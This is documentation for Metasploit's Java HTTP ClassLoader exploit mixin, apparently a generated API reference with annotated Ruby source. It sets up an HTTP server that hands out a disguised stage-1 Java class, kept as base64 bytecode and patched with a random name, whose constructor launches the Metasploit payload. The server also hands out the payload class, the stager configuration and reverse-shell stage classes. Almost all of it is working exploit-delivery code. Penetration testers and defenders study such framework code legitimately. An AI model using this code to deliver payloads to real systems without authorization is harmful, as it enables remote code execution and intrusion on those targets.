Module: Msf::Exploit::Remote::Java::HTTP::ClassLoader

Includes:
HttpServer
Defined in:
lib/msf/core/exploit/remote/java/http/class_loader.rb

Instance Attribute Summary

Attributes included from SocketServer

#service

Instance Method Summary

Methods included from HttpServer

#add_resource, #add_robots_resource, #autofilter, #check_dependencies, #cleanup, #cli, #cli=, #close_client, #create_response, #fingerprint_user_agent, #get_resource, #get_uri, #hardcoded_uripath, #on_request_uri, #print_prefix, #random_uri, #regenerate_payload, #remove_resource, #report_user_agent, #resource_uri, #send_local_redirect, #send_not_found, #send_redirect, #send_response, #send_robots, #srvhost_addr, #srvport, #start_service, #use_zlib

Methods included from Auxiliary::Report

#active_db?, #create_cracked_credential, #create_credential, #create_credential_and_login, #create_credential_login, #db, #db_warning_given?, #get_client, #get_host, #inside_workspace_boundary?, #invalidate_login, #mytask, #myworkspace, #myworkspace_id, #report_auth_info, #report_client, #report_exploit, #report_host, #report_loot, #report_note, #report_service, #report_vuln, #report_web_form, #report_web_page, #report_web_site, #report_web_vuln, #store_cred, #store_local, #store_loot

Methods included from Metasploit::Framework::Require

optionally, optionally_active_record_railtie, optionally_include_metasploit_credential_creation, #optionally_include_metasploit_credential_creation, optionally_require_metasploit_db_gem_engines

Methods included from TcpServer

#on_client_close, #on_client_connect, #ssl, #ssl_cert, #ssl_cipher, #ssl_compression, #ssl_version, #start_service

Methods included from SocketServer

#_determine_server_comm, #bindhost, #bindport, #cleanup, #cleanup_service, #exploit, #on_client_data, #primer, #regenerate_payload, #srvhost, #srvport, #start_service, #via_string

Instance Method Details

#class_name ⇒ Object



# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 128

# Random, capitalised Java class name used for the stage-1 class.
#
# Memoised: the same name has to be served in the HEAD whitelist, matched in
# the +case+ branch of #java_class_loader_on_request_uri and patched into the
# bytecode via #packed_class_name, so it is generated once per module instance.
#
# @return [String] a name of 8..42 characters from +rand_text_alpha+, first letter upper-cased
def class_name
  @class_name = rand_text_alpha(8..42).capitalize if @class_name.nil?
  @class_name
end

#constructor_class ⇒ Object

import metasploit.Payload;

// Source form of the class that constructor_class (below) ships as base64
// bytecode. The class name "Metasploit" is the string that method rewrites
// to the random class_name before serving it.
public class Metasploit {
  // The payload is started from the constructor, so constructing an instance
  // of this class is all it takes to run Payload.main.
  public Metasploit() {
    try {
      Payload.main(null);
    }
    // Swallowed on purpose: a failure leaves no trace on the target (presumably
    // the intent; nothing here reports it back).
    catch (Exception e) {}
  }
}


# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 112

# Bytecode of the stage-1 class, patched to carry #class_name.
#
# The embedded base64 is the compiled form of the +Metasploit+ class shown
# above (a constructor that calls +metasploit.Payload.main+). Inside the class
# file the name "Metasploit" is stored as a 2-byte big-endian length (0x000a)
# followed by the bytes, which is exactly the layout #packed_class_name
# produces for the random name.
#
# @return [String] raw .class bytes with the class name replaced
def constructor_class
  encoded = <<~EOF
    yv66vgAAADMAFQoABQAMCgANAA4HAA8HABAHABEBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAN
    U3RhY2tNYXBUYWJsZQcAEAcADwwABgAHBwASDAATABQBABNqYXZhL2xhbmcvRXhjZXB0aW9u
    AQAKTWV0YXNwbG9pdAEAEGphdmEvbGFuZy9PYmplY3QBABJtZXRhc3Bsb2l0L1BheWxvYWQB
    AARtYWluAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgAhAAQABQAAAAAAAQABAAYABwABAAgA
    AAA3AAEAAgAAAA0qtwABAbgAAqcABEyxAAEABAAIAAsAAwABAAkAAAAQAAL/AAsAAQcACgAB
    BwALAAAA
  EOF
  bytecode = Rex::Text.decode_base64(encoded)

  # Swap the length-prefixed "Metasploit" constant for the random class name.
  # Only the first occurrence is replaced; the replacement is a length byte
  # (<= 42, see #class_name) plus alphabetic text, so String#sub's backslash
  # handling in the replacement cannot be triggered.
  bytecode.sub("\x00\x0aMetasploit", packed_class_name)
end

#initialize(info = {}) ⇒ Object



# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 12

# Module constructor: merges this mixin's defaults into +info+ before
# handing the result to the parent constructor.
#
# @param info [Hash] module metadata supplied by the including module;
#   'Stance' is set to Aggressive here
# @return whatever the parent constructor returns
def initialize(info = {})
  merged_info = update_info(info, 'Stance' => Msf::Exploit::Stance::Aggressive)
  super(merged_info)
end

#java_class_loader_on_request_uri(cli, request) ⇒ Object



# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 41

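# Serves the artefacts a remote Java class loader asks for, keyed on the
# path that follows #java_class_loader_resource_uri.
#
# Only GET and HEAD are answered. HEAD gets an empty 200 for the three core
# resources and a 404 otherwise; GET returns the bytes of the requested
# stage (stage-1 constructor class, stage-2 Payload class, stage-3 stager
# config, or one of the optional stage-4 classes) as
# application/octet-stream, and 404 for anything else.
#
# @param cli the client connection, passed through to the send_* helpers
# @param request the parsed HTTP request (+method+, +uri+, +raw_uri+ are read)
# @return the result of #send_response / #send_not_found, or nil for an
#   ignored method
def java_class_loader_on_request_uri(cli, request)
  vprint_status("#{request.method} #{request.uri} requested")

  unless %w[HEAD GET].include?(request.method)
    vprint_error("Ignoring #{request.method} request")
    return
  end

  # Everything after the class loader's base URI names the artefact; a URI
  # without that prefix is left untouched and ends up as a 404 below.
  resource = request.raw_uri.delete_prefix(java_class_loader_resource_uri)

  if request.method == 'HEAD'
    # NOTE(review): HEAD only accepts the three core resources; the optional
    # stage-4 classes that GET serves below get a 404 on HEAD. Presumably the
    # target's class loader only issues GET for them — confirm before relying on it.
    whitelist = %W[
      #{class_name}.class
      metasploit/Payload.class
      metasploit.dat
    ]

    unless whitelist.include?(resource)
      vprint_error('Sending 404')
      return send_not_found(cli)
    end

    vprint_good('Sending 200')
    return send_response(cli, '')
  end

  res =
    case resource
    # Stage 1
    when "#{class_name}.class"
      vprint_good('Sending the constructor class')
      # This contains the constructor that will call our JavaPayload
      constructor_class
    # Stage 2
    when 'metasploit/Payload.class'
      vprint_good('Sending the main payload class')
      # This is our JavaPayload as a compiled class
      MetasploitPayloads.read('java/metasploit/Payload.class')
    # Stage 3
    when 'metasploit.dat'
      vprint_good('Sending the payload configuration data')
      # This tells the target how to address the payload; this is the magic!
      payload_instance.stager_config
    # (Optional) Stage 4 data for unstaged payloads such as java/shell_reverse_tcp.
    # Anchored with \A and \z: ^ and $ only anchor lines in Ruby, so a resource
    # with an embedded newline before the expected name would previously have
    # matched and been interpolated into the MetasploitPayloads.read path.
    when %r{\Ajavapayload/stage/(?:Shell|Stage|StreamForwarder)\.class\z}
      vprint_good("Sending additional payload class: #{resource}")
      MetasploitPayloads.read("java/#{resource}")
    else
      vprint_error('Sending 404')
      return send_not_found(cli)
    end

  send_response(
    cli,
    res,
    # file -I says application/x-java-applet, but I don't believe it
    'Content-Type' => 'application/octet-stream'
  )
end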

#java_class_loader_resource_uri ⇒ Object



# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 33

# Base URI the Java class loader fetches from, always ending in "/".
#
# Memoised because it is consulted on every request (to strip the prefix
# from the requested path) and again when the service is started.
#
# @return [String] #resource_uri, with a "/" appended if it lacked one
def java_class_loader_resource_uri
  @java_class_loader_resource_uri ||= begin
    # the resource URI must end in / for the class loading to work
    base = resource_uri
    base.end_with?('/') ? base : "#{base}/"
  end
end

#java_class_loader_start_service(opts = {}) ⇒ Object



# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 18

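# Starts the HTTP service and registers #java_class_loader_on_request_uri
# as the handler for the class-loader URI.
#
# @param opts [Hash] options forwarded to #start_service. +opts['Uri']+ is
#   filled in with the handler Proc and path (caller-supplied 'Uri' entries
#   win on merge) and +opts['Path']+ overrides the default resource path.
#   The hash is mutated in place.
# @return whatever #get_uri returns once the service is up
def java_class_loader_start_service(opts = {})
  # XXX: This is a workaround until we can take SSL in opts
  ssl = datastore['SSL']
  begin
    datastore['SSL'] = false

    opts['Uri'] = {
      'Proc' => proc { |cli, req| java_class_loader_on_request_uri(cli, req) },
      'Path' => opts['Path'] || java_class_loader_resource_uri
    }.update(opts['Uri'] || {})
    start_service(opts)
  ensure
    # Restore unconditionally: if start_service (or the URI setup) raises, the
    # module would otherwise be left with SSL forced off for the rest of its run.
    datastore['SSL'] = ssl
  end

  get_uri
end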

#packed_class_name ⇒ Object



# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 132

# #class_name in the form the class file stores it: a 2-byte big-endian
# length followed by the name bytes — the layout #constructor_class patches
# in over "\x00\x0aMetasploit".
#
# @return [String] length-prefixed class name
def packed_class_name
  name = class_name
  # 'n' packs a 16-bit big-endian value. String#length (characters) is used as
  # the byte count, which assumes rand_text_alpha yields ASCII — TODO confirm.
  length_prefix = [name.length].pack('n')
  "#{length_prefix}#{name}"
end